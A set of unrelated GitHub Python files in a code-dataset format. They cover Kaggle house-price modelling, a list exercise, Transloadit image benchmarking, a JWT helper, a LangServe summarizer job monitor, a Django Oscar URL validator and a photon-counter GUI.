2\r\ntest_data['AllSF-3'] = test_data['AllSF'] ** 3\r\ntest_data['AllSF-Sq'] = np.sqrt(test_data['AllSF'])\r\ntest_data['AllFlrsSF-2'] = test_data['AllFlrsSF'] ** 2\r\ntest_data['AllFlrsSF-3'] = test_data['AllFlrsSF'] ** 3\r\ntest_data['AllFlrsSF-Sq'] = np.sqrt(test_data['AllFlrsSF'])\r\ntest_data['GrLivArea-2'] = test_data['GrLivArea'] ** 2\r\ntest_data['GrLivArea-3'] = test_data['GrLivArea'] ** 3\r\ntest_data['GrLivArea-Sq'] = np.sqrt(test_data['GrLivArea'])\r\ntest_data['SimplOverallQual-s2'] = test_data['SimplOverallQual'] ** 2\r\ntest_data['SimplOverallQual-s3'] = test_data['SimplOverallQual'] ** 3\r\ntest_data['SimplOverallQual-Sq'] = np.sqrt(test_data['SimplOverallQual'])\r\ntest_data['ExterQual-2'] = test_data['ExterQual'] ** 2\r\ntest_data['ExterQual-3'] = test_data['ExterQual'] ** 3\r\ntest_data['ExterQual-Sq'] = np.sqrt(test_data['ExterQual'])\r\ntest_data['GarageCars-2'] = test_data['GarageCars'] ** 2\r\ntest_data['GarageCars-3'] = test_data['GarageCars'] ** 3\r\ntest_data['GarageCars-Sq'] = np.sqrt(test_data['GarageCars'])\r\ntest_data['TotalBath-2'] = test_data['TotalBath'] ** 2\r\ntest_data['TotalBath-3'] = test_data['TotalBath'] ** 3\r\ntest_data['TotalBath-Sq'] = np.sqrt(test_data['TotalBath'])\r\ntest_data['KitchenQual-2'] = test_data['KitchenQual'] ** 2\r\ntest_data['KitchenQual-3'] = test_data['KitchenQual'] ** 3\r\ntest_data['KitchenQual-Sq'] = np.sqrt(test_data['KitchenQual'])\r\ntest_data['GarageScore-2'] = test_data['GarageScore'] ** 2\r\ntest_data['GarageScore-3'] = test_data['GarageScore'] ** 3\r\ntest_data['GarageScore-Sq'] = np.sqrt(test_data['GarageScore'])\r\n\r\n\r\n################################################### 特征丢弃 #############################################################\r\n\r\ntest_data = test_data.drop(['Alley'], axis=1)\r\ntrain_data = train_data.drop(['Alley'], axis=1)\r\ntest_data = test_data.drop(['Utilities'], axis=1)\r\ntrain_data = train_data.drop(['Utilities'], axis=1)\r\ntest_data = test_data.drop(['PoolArea'], axis=1)\r\ntrain_data = train_data.drop(['PoolArea'], axis=1)\r\n\r\n\r\n\r\n# 因为test中没有\"GrLivArea\" > 4000的,所以可以删掉,以防过拟合\r\ntrain_data.drop(train_data[train_data[\"GrLivArea\"] > 4000].index, inplace=True)\r\n\r\n\r\n################################################### 使用log1p #############################################################\r\n\r\n'''\r\nfeats = train_data.columns.difference(['Id','SalePrice'])\r\nfrom scipy.stats import skew, skewtest\r\nall_data = pd.concat((train_data.loc[:,feats], test_data.loc[:,feats]))\r\nnumeric_feats = all_data.dtypes[all_data.dtypes != 
\"object\"].index\r\nskewed_feats = train_data[numeric_feats].apply(lambda x: skew(x.dropna())) \r\nskewed_feats = skewed_feats[skewed_feats > 0.75]\r\nskewed_feats = skewed_feats.index\r\n\r\nprint(skewed_feats)\r\n\r\ntrain_data[skewed_feats] = np.log1p(train_data[skewed_feats])\r\ntest_data[skewed_feats] = np.log1p(test_data[skewed_feats])\r\n'''\r\n\r\n\r\n############################################ 对类型特征编码 #############################################################\r\n\r\nfor cols in train_data.columns:\r\n if train_data[cols].dtype == np.object:\r\n train_data = pd.concat((train_data, pd.get_dummies(train_data[cols], prefix=cols)), axis=1)\r\n del train_data[cols]\r\n\r\nfor cols in test_data.columns:\r\n if test_data[cols].dtype == np.object:\r\n test_data = pd.concat((test_data, pd.get_dummies(test_data[cols], prefix=cols)), axis=1)\r\n del test_data[cols] \r\n\r\n\r\n\r\n################################################### 特征对齐 #############################################################\r\n\r\n#特征对其时会将train_set中SalePrice,'Id'删去,所以先保留\r\ntrain_y = np.log1p(train_data['SalePrice'])\r\n\r\n\r\n# 保证两边不会有不同时存在的特征\r\ncol_train = train_data.columns\r\ncol_test = test_data.columns\r\nfor index in col_train:\r\n if index in col_test:\r\n pass\r\n else:\r\n del train_data[index]\r\n\r\ncol_train = train_data.columns\r\ncol_test = test_data.columns\r\nfor index in col_test:\r\n if index in col_train:\r\n pass\r\n else:\r\n del test_data[index] \r\n\r\n\r\n################################################### 特征重要性排序 #############################################################\r\n\r\n\r\n\"\"\" RF特征重要性选择 \"\"\"\r\n'''\r\netr = RandomForestRegressor(n_estimators = 400)\r\ntrain_x = train_data\r\netr.fit(train_x, train_y)\r\nimp = etr.feature_importances_\r\nprint('###############################')\r\nprint(imp)\r\nprint(etr.n_features_)\r\nimp = pd.DataFrame({'feature': train_x.columns, 'score': imp})\r\nimp = imp.sort_values(['score'], ascending=[0])\r\nprint('###############################')\r\nprint(imp)\r\n'''\r\n# GBDT特征重要性选择\r\ngbdt = GradientBoostingRegressor(\r\n random_state=1,\r\n learning_rate=0.015, \r\n min_samples_split=2,\r\n max_features='sqrt', # 分裂的feature是随机挑选的\r\n n_estimators=100,\r\n min_samples_leaf=1,\r\n subsample=0.2,\r\n max_depth=3,\r\n )\r\ntrain_x = train_data\r\ngbdt.fit(train_x, train_y)\r\nimp = gbdt.feature_importances_\r\nimp = pd.DataFrame({'feature': train_x.columns, 'score': imp})\r\nimp = imp.sort_values(['score'], ascending=[0])\r\n#bivariate analysis saleprice/grlivarea \r\n#imp[['feature','score']].plot(kind='bar', stacked=True) \r\n\r\n\r\n\r\n\r\n################################################### 训练和输出结果 #############################################################\r\n\r\n\r\n################################ 准备数据 ################################\r\nselect_feature = imp['feature'][:75]\r\nxtrain_feature = train_x.loc[:,select_feature]\r\nxtest_feature = test_data.loc[:,select_feature]\r\n\r\n\r\n################################ 分类器一 ################################\r\n\r\n# Xgboost\r\nregr = xgb.XGBRegressor(\r\n colsample_bytree=0.2,\r\n gamma=0.0,\r\n learning_rate=0.05,\r\n max_depth=6,\r\n min_child_weight=1.5,\r\n n_estimators=7200, \r\n reg_alpha=0.9,\r\n reg_lambda=0.6,\r\n subsample=0.2,\r\n seed=42,\r\n silent=0)\r\n\r\nregr.fit(xtrain_feature, train_y)\r\ny_pred = regr.predict(xtrain_feature)\r\ny_test = train_y\r\nprint(\"XGBoost score on training set: \", rmse(y_test, y_pred))\r\ny_pred_xgb = 
regr.predict(xtest_feature)\r\n\r\n\r\n################################ 分类器二 ################################\r\n\r\n# 2* Ridge\r\nridge = RidgeCV(alphas = [0.01, 0.03, 0.06, 0.1, 0.3, 0.6, 1, 3, 6, 10, 30, 24])\r\nridge.fit(xtrain_feature, train_y)\r\nalpha = ridge.alpha_\r\nprint(\"Best alpha :\", alpha)\r\nridge = RidgeCV(alphas = [alpha * .6, alpha * .65, alpha * .7, alpha * .75, alpha * .8, alpha * .85, \r\n                          alpha * .9, alpha * .95, alpha, alpha * 1.05, alpha * 1.1, alpha * 1.15,\r\n                          alpha * 1.25, alpha * 1.3, alpha * 1.35, alpha * 1.4], \r\n                cv = 10)\r\nridge.fit(xtrain_feature, train_y)\r\nalpha = ridge.alpha_\r\nprint(\"Best alpha :\", alpha)\r\ny_test = train_y\r\ny_pred = ridge.predict(xtrain_feature)\r\nprint(\"Ridge RMSE score on training set: \", rmse(y_test, y_pred))\r\ny_test_rdg = ridge.predict(xtest_feature)\r\n\r\n\r\n################################ 分类器三 ################################\r\n\r\n# Lasso\r\n'''\r\n部分测试结果:\r\nbest_alpha = 0.00099, 0.12906\r\nbest_alpha = 0.00097, 0.12888\r\nbest_alpha = 0.00096, 0.12775\r\n\r\n'''\r\nbest_alpha = 0.00096\r\nregr = Lasso(alpha=best_alpha, max_iter=50000)\r\nregr.fit(xtrain_feature, train_y)\r\ny_pred = regr.predict(xtrain_feature)\r\ny_test = train_y\r\nprint(\"Lasso score on training set: \", rmse(y_test, y_pred))\r\ny_pred_lasso = regr.predict(xtest_feature)\r\n\r\n\r\n################################ 分类器四 ################################\r\n\r\n# 4* ElasticNet\r\nelasticNet = ElasticNetCV(l1_ratio = [0.1, 0.3, 0.5, 0.6, 0.7, 0.8, 0.85, 0.9, 0.95, 1],\r\n                          alphas = [0.0001, 0.0003, 0.0006, 0.001, 0.003, 0.006, \r\n                                    0.01, 0.03, 0.06, 0.1, 0.3, 0.6, 1, 3, 6], \r\n                          max_iter = 50000, cv = 10)\r\nelasticNet.fit(xtrain_feature, train_y)\r\nalpha = elasticNet.alpha_\r\nratio = elasticNet.l1_ratio_\r\nprint(\"Best l1_ratio :\", ratio)\r\nprint(\"Best alpha :\", alpha )\r\n\r\ny_pred = elasticNet.predict(xtrain_feature)\r\nprint(\"ela score on training set: \", rmse(train_y, y_pred))\r\ny_test_ela = elasticNet.predict(xtest_feature)\r\n\r\n\r\n################################ 糅合结果 ################################\r\n\r\n# 根据前面四个分类器的预测得到结果\r\n# y_pred_xgb, y_test_ela,y_pred_lasso ,y_test_rdg\r\nsubm = pd.read_csv(\"../input/sample_submission.csv\")\r\nsubm.iloc[:,1] = np.array(np.expm1(y_pred_xgb))\r\nsubm.to_csv('../log1p_xgb.csv', index=None)\r\nsubm.iloc[:,1] = np.array(np.expm1(y_test_ela))\r\nsubm.to_csv('../log1p_ela.csv', index=None)\r\nsubm.iloc[:,1] = np.array(np.expm1(y_pred_lasso))\r\nsubm.to_csv('../log1p_lasso.csv', index=None)\r\nsubm.iloc[:,1] = np.array(np.expm1(y_test_rdg))\r\nsubm.to_csv('../log1p_rgd.csv', index=None)\r\n\r\ny_pred = (y_pred_xgb + y_test_ela )/2  # 此语句可修改,这里留下的是准确率最高的组合\r\nsubm.iloc[:,1] = np.array(np.expm1(y_pred))\r\nsubm.to_csv('../log1p_xgb_ela.csv', index=None)\r\n","repo_name":"zht96pi/KaggleHousePrice","sub_path":"Kaggle_House_Price.py","file_name":"Kaggle_House_Price.py","file_ext":"py","file_size_in_byte":39022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"71045738027","text":"'''\nWrite a Python program to remove words from a given list of strings containing a character or string.\nOriginal list:\nlist1: ['Red color', 'Orange#', 'Green', 'Orange @', 'White']\nCharacter list:\n['#', 'color', '@']\nNew list:\n['Red', '', 'Green', 'Orange', 'White']\n'''\n\nlst = ['Red color', 'Orange#', 'Green', 'Orange @', 'White']\nrep = ['#', 'color', '@']\n\n\ndef string_replacement(lst,rep):\n    res = []\n    for i in lst:\n        element_level = []\n        
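# blank out a word entirely if it contains any token from rep\n        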
for j in i.split(' '):\n x = j\n for k in rep:\n x = '' if x.find(k)!=-1 else x\n element_level.append(x.strip())\n res.append(' '.join(element_level))\n return res\n\nprint(string_replacement(lst,rep))","repo_name":"Tashish97/Data-Science","sub_path":"Python_Practice/Lists/q77.py","file_name":"q77.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39692470664","text":"# pip install pytransloadit\n# pip install python-decouple\nfrom fileinput import filename\nimport pathlib\nfrom transloadit import client\nfrom decouple import config\nimport csv\n\n# Create a .env file with these values for your account\nAUTH_KEY = config('AUTH_KEY')\nAUTH_SECRET = config('AUTH_SECRET')\n\ntl = client.Transloadit(AUTH_KEY, AUTH_SECRET)\n\nqualities = {25, 50, 75, 100}\nimages = {\n 'test0.webp', \n 'test1.jpg', \n 'test2.jpg', \n 'test3.png', \n 'test4.png', \n 'test5.jpg',\n 'test6.jpg',\n 'test7.gif',\n 'test8.svg',\n 'test9.gif',\n 'test10.webp',\n 'test10.svg',\n}\nFILENAME = 'quality.csv'\n\n# Write columns of CSV\nwith open(FILENAME, mode='w') as columns:\n column_writer = csv.writer(\n columns, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n column_writer.writerow(['Image', 'Input Size (MB)', 'Output Size (MB)', 'Execution Time (s)',\n 'Input Format', 'Output Format', 'Quality'])\n\n\ndef write_to_csv(image, quality, assembly_response):\n print(assembly_response.data)\n input_size = assembly_response.data['uploads'][0]['size'] / 1000000\n output_size = assembly_response.data['results']['format'][0]['size'] / 1000000\n execution_time = assembly_response.data['execution_duration']\n input_format = pathlib.Path(image).suffix\n output_format = assembly_response.data['results']['format'][0]['ext']\n\n with open(FILENAME, mode='a') as data:\n data_writer = csv.writer(\n data, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n data_writer.writerow([image, input_size, output_size, execution_time, input_format,\n output_format, quality])\n\n\ncount = 0\nfor image in images:\n for quality in qualities:\n assembly = tl.new_assembly()\n\n # Set Encoding Instructions\n assembly.add_step('format', '/image/resize', {\n 'use': ':original',\n 'format': 'jpg',\n 'quality': quality\n })\n\n # Add files to upload\n assembly.add_file(open(image, 'rb'))\n\n # Start the Assembly\n assembly_response = assembly.create(retries=5, wait=True)\n\n write_to_csv(image, quality, assembly_response)\n count += 1\n print(count)\n","repo_name":"Missing-Tech/OptimizeTester","sub_path":"quality.py","file_name":"quality.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18244616630","text":"import jwt\nimport time\n\ndef make_token(data):\n key = \"895BC687BB08374C1963CFA2DEEF1F7E60A75B76DB4F4FF4D5AA2C2A3BF78891\"\n now = time.time()\n expiretime = 60 * 60\n payload = {\n \"username\": data.username,\n \"expire\": now + expiretime\n }\n return jwt.encode(payload,key,algorithm = 'HS256')\n","repo_name":"daniel2012600/shop_learning","sub_path":"backend/keyboardmarket/tools/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"845478581","text":"import numpy as np\nimport cPickle\n\n# enthought library imports\nfrom traits.api import SingletonHasTraits, HasTraits, Trait, Instance, 
Property, Int, Float, Range,\\\n Bool, Array, String, Str, Enum, Button, Tuple, List, on_trait_change,\\\n cached_property, DelegatesTo, Font\nfrom traitsui.api import View, Item, Group, HGroup, VGroup, VSplit, Tabbed, EnumEditor\n\nfrom traitsui.file_dialog import save_file\nfrom traitsui.menu import Action, Menu, MenuBar\n\nfrom enable.api import ComponentEditor, Component\nfrom chaco.api import Plot, ScatterPlot, CMapImagePlot, ArrayPlotData,\\\n Spectral, ColorBar, LinearMapper, DataView,\\\n LinePlot, ArrayDataSource, HPlotContainer, hot\n#from chaco.tools.api import ZoomTool\nfrom chaco.tools.cursor_tool import CursorTool, BaseCursorTool\n\nfrom tools.utility import GetSetItemsHandler, GetSetItemsMixin\n\nimport threading\nimport time\n\nfrom tools.emod import Job\nfrom tools.color import scheme\n\nclass StartThreadHandler( GetSetItemsHandler ):\n\n def init(self, info):\n info.object.start()\n \nclass PhotonTimeTrace( Job, GetSetItemsMixin ):\n\n TraceLength = Range(low=10, high=10000, value=1000, desc='Length of Count Trace', label='Trace Length')\n SecondsPerPoint = Range(low=0.001, high=1, value=0.05, desc='Seconds per point [s]', label='Seconds per point [s]')\n RefreshRate = Range(low=0.01, high=1, value=0.1, desc='Refresh rate [s]', label='Refresh rate [s]')\n\n # trace data\n C0 = Array()\n C1 = Array()\n C0C1 = Array()\n T = Array()\n \n counts = Float(0.0)\n throttle = 0\n throttle_level = 2\n \n c_enable0 = Bool(False, label='channel 0', desc='enable channel 0')\n c_enable1 = Bool(False, label='channel 1', desc='enable channel 1')\n sum_enable = Bool(True, label='c0 + c1', desc='enable sum c0 + c1')\n \n baseline = Bool(True, label='baseline', desc='show baseline')\n \n TracePlot = Instance( Plot )\n TraceData = Instance( ArrayPlotData )\n \n digits_data = Instance( ArrayPlotData )\n digits_plot = Instance( Plot )\n \n \n def __init__(self, time_tagger, **kwargs):\n super(PhotonTimeTrace, self).__init__(**kwargs)\n self.time_tagger = time_tagger\n self.on_trait_change(self._update_T, 'T', dispatch='ui')\n self.on_trait_change(self._update_C0, 'C0', dispatch='ui')\n self.on_trait_change(self._update_C1, 'C1', dispatch='ui')\n self.on_trait_change(self._update_C0C1, 'C0C1', dispatch='ui')\n self._create_counter()\n \n self._create_digits_plot()\n self.update_digits_plot()\n\n def _create_counter(self):\n self._counter0 = self.time_tagger.Counter(0, int(self.SecondsPerPoint*1e12), self.TraceLength) \n self._counter1 = self.time_tagger.Counter(1, int(self.SecondsPerPoint*1e12), self.TraceLength) \n \n def _C0_default(self):\n return np.zeros((self.TraceLength,)) \n \n def _C1_default(self):\n return np.zeros((self.TraceLength,))\n \n def _C0C1_default(self):\n return np.zeros((self.TraceLength,))\n \n def _counts_default(self):\n return 0\n \n def _T_default(self):\n return self.SecondsPerPoint*np.arange(self.TraceLength)\n\n def _update_T(self):\n self.TraceData.set_data('t', self.T)\n\n def _update_C0(self):\n self.TraceData.set_data('y0', self.C0)\n #self.TracePlot.request_redraw()\n\n def _update_C1(self):\n self.TraceData.set_data('y1', self.C1)\n #self.TracePlot.request_redraw()\n \n def _update_C0C1(self):\n self.TraceData.set_data('y8', self.C0C1)\n #self.TracePlot.request_redraw()\n\n def _TraceLength_changed(self):\n self.C0 = self._C0_default()\n self.C1 = self._C1_default()\n self.C0C1 = self._C0C1_default()\n self.T = self._T_default()\n self._create_counter()\n \n def _SecondsPerPoint_changed(self):\n self.T = self._T_default()\n self._create_counter()\n\n def 
_TraceData_default(self):\n return ArrayPlotData(t=self.T, y0=self.C0, y1=self.C1, y8=self.C0C1)\n \n def _TracePlot_default(self):\n plot = Plot(self.TraceData, width=500, height=500, resizable='hv')\n plot.plot(('t','y8'), type='line', line_style='solid', color=0xFFFFFF, line_width=2, render_style='connectedpoints', name='ch0 & ch1')\n plot.bgcolor = scheme['background']\n plot.value_range.low = 0.0\n plot.x_grid = None\n plot.y_grid = None\n return plot\n \n @on_trait_change('baseline,c_enable0,c_enable1,sum_enable')\n def _replot(self):\n \n self.TracePlot = Plot(self.TraceData, width=500, height=500, resizable='hv')\n if self.baseline:\n self.TracePlot.value_range.low = 0.0\n if not self.baseline:\n self.TracePlot.value_range.low = 'auto'\n self.TracePlot.legend.align = 'll'\n self.TracePlot.bgcolor = scheme['background']\n self.TracePlot.x_grid = None\n self.TracePlot.y_grid = None\n \n n=0\n if self.c_enable0:\n self.TracePlot.plot(('t','y0'), type='line', line_style='solid', color=scheme['data 1'], line_width=2, render_style='connectedpoints', name='channel 0')\n n+=1\n if self.c_enable1:\n self.TracePlot.plot(('t','y1'), type='line', line_style='solid', color=scheme['data 2'], line_width=2, render_style='connectedpoints', name='channel 1')\n n+=1\n if self.sum_enable:\n self.TracePlot.plot(('t','y8'), type='line', line_style='solid', color=0xFFFFFF, line_width=2, render_style='connectedpoints', name='ch0 & ch1')\n n+=1\n if n > 3:\n self.TracePlot.legend.visible = True\n else:\n self.TracePlot.legend.visible = False\n \n def _baseline_changed(self):\n if self.baseline:\n self.TracePlot.value_range.low = 0.0\n if not self.baseline:\n self.TracePlot.value_range.low = 'auto'\n \n def _run(self):\n \"\"\"Acquire Count Trace\"\"\"\n while True:\n threading.current_thread().stop_request.wait(self.RefreshRate)\n if threading.current_thread().stop_request.isSet():\n break\n self.C0 = self._counter0.getData() / self.SecondsPerPoint / 1000.0 # kcounts / s\n self.C1 = self._counter1.getData() / self.SecondsPerPoint / 1000.0 # kcounts / s\n self.C0C1 = self.C0 + self.C1\n self.throttle = (self.throttle + 1) % self.throttle_level\n if self.throttle == 0:\n self.counts = self.C0C1[-1]\n \n \n # DIGITS PLOT\n def _create_digits_plot(self):\n data = ArrayPlotData(image=np.zeros((2,2)))\n plot = Plot(data, width=500, height=500, resizable='hv', aspect_ratio=37.0/9, padding=8, padding_left=48, padding_bottom=36)\n plot.img_plot('image',\n xbounds=(0, 1),\n ybounds=(0, 1),\n colormap=hot)\n plot.plots['plot0'][0].value_range.high_setting = 1\n plot.plots['plot0'][0].value_range.low_setting = 0\n plot.x_axis = None\n plot.y_axis = None\n self.digits_data = data\n self.digits_plot = plot\n \n @on_trait_change('counts')\n def update_digits_plot(self):\n string = ('%5.1f' % self.counts)[:5] + 'k'\n \n data = np.zeros((37,9))\n for i, char in enumerate(string):\n data[6*i+1:6*i+6,1:-1] = DIGIT[char].transpose()\n if self.counts >= 2e3:\n data *= 0.4\n self.digits_data.set_data('image', data.transpose()[::-1])\n \n \n traits_view = View( VGroup(VSplit(Item('TracePlot', editor=ComponentEditor(), show_label=False),\n Item('digits_plot', editor=ComponentEditor(), show_label=False)),\n #VGroup(Item('c_enable0'),Item('c_enable1'),Item('c_enable2'),Item('c_enable3'),Item('c_enable4'),Item('c_enable5'),Item('c_enable6'),Item('c_enable7'),Item('sum_enable'))\n HGroup(Item('c_enable0'),Item('c_enable1'),Item('sum_enable'),Item('baseline'))\n ),\n Item('TraceLength'),\n Item ('SecondsPerPoint'),\n Item 
('RefreshRate'),\n title='Counter',\n width=895,\n height=1200,\n buttons=[],\n resizable=True,\n x=1025,\n y=0,\n handler=StartThreadHandler\n )\n \nDIGIT = {}\nDIGIT['0'] = np.array([0,1,1,1,0,\n 1,0,0,0,1,\n 1,0,0,1,1,\n 1,0,1,0,1,\n 1,1,0,0,1,\n 1,0,0,0,1,\n 0,1,1,1,0]).reshape(7,5)\nDIGIT['1'] = np.array([0,0,1,0,0,\n 0,1,1,0,0,\n 1,0,1,0,0,\n 0,0,1,0,0,\n 0,0,1,0,0,\n 0,0,1,0,0,\n 1,1,1,1,1]).reshape(7,5)\nDIGIT['2'] = np.array([0,1,1,1,0,\n 1,0,0,0,1,\n 0,0,0,0,1,\n 0,0,0,1,0,\n 0,0,1,0,0,\n 0,1,0,0,0,\n 1,1,1,1,1]).reshape(7,5)\nDIGIT['3'] = np.array([0,1,1,1,0,\n 1,0,0,0,1,\n 0,0,0,0,1,\n 0,0,0,1,0,\n 0,0,0,0,1,\n 1,0,0,0,1,\n 0,1,1,1,0]).reshape(7,5)\nDIGIT['4'] = np.array([0,0,1,0,0,\n 0,1,0,0,0,\n 0,1,0,0,0,\n 1,0,0,1,0,\n 1,1,1,1,1,\n 0,0,0,1,0,\n 0,0,0,1,0]).reshape(7,5)\nDIGIT['5'] = np.array([1,1,1,1,1,\n 1,0,0,0,0,\n 1,0,0,0,0,\n 1,1,1,1,0,\n 0,0,0,0,1,\n 1,0,0,0,1,\n 0,1,1,1,0]).reshape(7,5)\nDIGIT['6'] = np.array([0,1,1,1,0,\n 1,0,0,0,1,\n 1,0,0,0,0,\n 1,1,1,1,0,\n 1,0,0,0,1,\n 1,0,0,0,1,\n 0,1,1,1,0]).reshape(7,5)\nDIGIT['7'] = np.array([1,1,1,1,1,\n 0,0,0,0,1,\n 0,0,0,0,1,\n 0,0,0,1,0,\n 0,0,1,0,0,\n 0,1,0,0,0,\n 1,0,0,0,0]).reshape(7,5)\nDIGIT['8'] = np.array([0,1,1,1,0,\n 1,0,0,0,1,\n 1,0,0,0,1,\n 0,1,1,1,0,\n 1,0,0,0,1,\n 1,0,0,0,1,\n 0,1,1,1,0]).reshape(7,5)\nDIGIT['9'] = np.array([0,1,1,1,0,\n 1,0,0,0,1,\n 1,0,0,0,1,\n 0,1,1,1,1,\n 0,0,0,0,1,\n 1,0,0,0,1,\n 0,1,1,1,0]).reshape(7,5)\nDIGIT['.'] = np.array([0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,1,0,0]).reshape(7,5)\nDIGIT['k'] = np.array([1,0,0,0,0,\n 1,0,0,0,0,\n 1,0,0,0,1,\n 1,0,0,1,0,\n 1,0,1,0,0,\n 1,1,0,1,0,\n 1,0,0,0,1]).reshape(7,5)\nDIGIT[' '] = np.array([0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,0,0,0]).reshape(7,5)\n\nif __name__=='__main__':\n pass","repo_name":"Faridelnik/Pi3Diamond","sub_path":"measurements/photon_time_trace.py","file_name":"photon_time_trace.py","file_ext":"py","file_size_in_byte":12084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17868151036","text":"import logging\nfrom logging import Formatter, getLogger, StreamHandler\nfrom concurrent.futures import ProcessPoolExecutor\nimport asyncio\nimport os\nfrom time import sleep\n\nfrom langserve import RemoteRunnable\nimport httpx\nfrom src.backend import store_data_job\nfrom src.backend.configurations import ServiceConfigurations, CacheConfigurations\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\n\n\nlog_format = Formatter(\"[%(asctime)s] [%(levelname)s] [%(process)d] [%(name)s] [%(funcName)s] [%(lineno)d] %(message)s\",\n datefmt='%d/%b/%Y:%H:%M:%S (%Z)'\n )\nlogger = getLogger('monitor')\nstdout_handler = StreamHandler()\nstdout_handler.setFormatter(log_format)\nlogger.addHandler(stdout_handler)\nlogger.setLevel(logging.DEBUG)\n\n# fileConfig('logging.conf')\n# logger = logging.getLogger('endpoint')\n\n\n\ntranscriber_service_url = ServiceConfigurations.services.get('transcriber', 'http://transcriber:5000') + '/transcribe/'\nsummarizer_service_url = ServiceConfigurations.services.get('summarizer', 'http://summarizer:6000') + '/summarize/'\n\nmapreduce_chain = RemoteRunnable(summarizer_service_url)\n\n\nlogger.debug(f'transcriber service url : {transcriber_service_url}')\nlogger.debug(f'summarizer service url : {summarizer_service_url}')\nsummary_dir = str(os.getenv('SUMMARY_PATH', 'summaries'))\nlogger.debug(f'summary will be stored in : {summary_dir}')\n\ndef 
_trigger_prediction_if_queue(transcriber_url : str, summarizer_service_url : str) :\n job_id = store_data_job.right_pop_queue(CacheConfigurations.queue_name)\n if job_id is not None :\n\n url = store_data_job.get_data_redis(job_id)\n logger.debug(f'pop a job [{job_id}] to process from redis queue')\n\n # call transcriber endpoint\n try :\n transcriber_response = httpx.post(transcriber_url,\n headers = {'Content-Type' : 'application/json'},\n params = {'url' : url, 'job_id' : job_id},\n timeout = None)\n except : # \n logger.debug(f'error occurs at transcription api.')\n\n logger.debug(f'job_id[{job_id}] has been sent to [transcriber].')\n transcription_json = transcriber_response.json()\n \n transcription_path = transcription_json['transcription_path']\n video_id = transcription_json['video_id']\n\n logger.debug(f'job_id[{job_id}] received response from [transcriber].')\n\n\n summary_path = f'{summary_dir}/{video_id}_summary.txt'\n\n \n logger.debug(f'job_id[{job_id}] has been sent to [summarizer].')\n \n try :\n summary_response = httpx.post(summarizer_service_url,\n headers = {'Content-Type' : 'application/json'},\n params = {'job_id' : job_id,\n 'transcript_path' : str(transcription_path),\n 'summary_path' : str(summary_path)\n },\n timeout = None\n )\n except :\n logger.debug(f'error occurs at summary api.')\n\n logger.debug(f'job_id[{job_id}] received response from [summarizer]')\n logger.debug(f'summary response : {summary_response}')\n\n\n\n summary = summary_response.json()['summary']\n logger.debug(f'job_id[{job_id}][summarizer response] : {summary}')\n store_data_job.set_data_redis(job_id, summary)\n\n \n\n\n\n\ndef _loop() :\n # send job request to transcriber & summarizer\n while True :\n sleep(1)\n _trigger_prediction_if_queue(transcriber_service_url, summarizer_service_url)\n \n\n\ndef monitoring_loop(num_procs : int = 4) :\n executor = ProcessPoolExecutor(num_procs)\n loop = asyncio.get_event_loop()\n\n for _ in range(num_procs) :\n asyncio.ensure_future(loop.run_in_executor(executor, _loop))\n\n loop.run_forever()\n\ndef main() :\n NUM_PROCS = int(os.getenv('NUM_PROCS', 1))\n logger.debug(f'monitoring runs {NUM_PROCS} processes.')\n monitoring_loop(NUM_PROCS)\n\nif __name__ == '__main__' :\n logger.info('start monitoring')\n main()","repo_name":"watanka/langchain-youtube-video-summarizer","sub_path":"src/backend/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6262969265","text":"import keyword\n\nfrom django.conf.urls.i18n import is_language_prefix_patterns_used\nfrom django.core import validators\nfrom django.core.exceptions import ValidationError\nfrom django.http import Http404\nfrom django.urls import get_urlconf, resolve\nfrom django.utils.translation import get_language, get_language_from_path\nfrom django.utils.translation import gettext_lazy as _\nfrom django.utils.translation import override\n\nfrom oscar.core.loading import get_model\n\n\nclass ExtendedURLValidator(validators.URLValidator):\n def __init__(self, *args, **kwargs):\n self.is_local_url = False\n super().__init__(*args, **kwargs)\n\n def __call__(self, value):\n try:\n super().__call__(value)\n except ValidationError:\n # The parent validator will raise an exception if the URL is not a\n # valid absolute URL so we test here to see if it is a local URL.\n if value:\n self.validate_local_url(value)\n else:\n raise\n\n def _validate_url(self, value):\n try:\n 
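# resolve() raises Http404 (via its Resolver404 subclass) when the path matches no URL pattern\n            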
resolve(value)\n except Http404:\n # We load flatpages here as it causes a circular reference problem\n # sometimes. FlatPages is None if not installed\n FlatPage = get_model(\"flatpages\", \"FlatPage\")\n if FlatPage is not None:\n try:\n FlatPage.objects.get(url=value)\n except FlatPage.DoesNotExist:\n self.is_local_url = True\n else:\n return\n raise ValidationError(_('The URL \"%s\" does not exist') % value)\n else:\n self.is_local_url = True\n\n def validate_local_url(self, value):\n value = self.clean_url(value)\n # If we have i18n pattern in the URLconf, by default it will be\n # resolved against default language by `LocaleRegexURLResolver`. In\n # this case, it won't resolve the path /de/catalogue/ when default\n # language code is \"en-gb\" and so that path validation won't pass,\n # which is incorrect. In order to work it around, we extract language\n # code from URL and override current locale within the locale prefix of\n # the URL.\n urlconf = get_urlconf()\n i18n_patterns_used, _ = is_language_prefix_patterns_used(urlconf)\n redefined_language = None\n if i18n_patterns_used:\n language = get_language_from_path(value)\n current_language = get_language()\n if language != current_language:\n redefined_language = language\n if redefined_language:\n with override(redefined_language):\n self._validate_url(value)\n else:\n self._validate_url(value)\n\n def clean_url(self, value):\n \"\"\"\n Ensure url 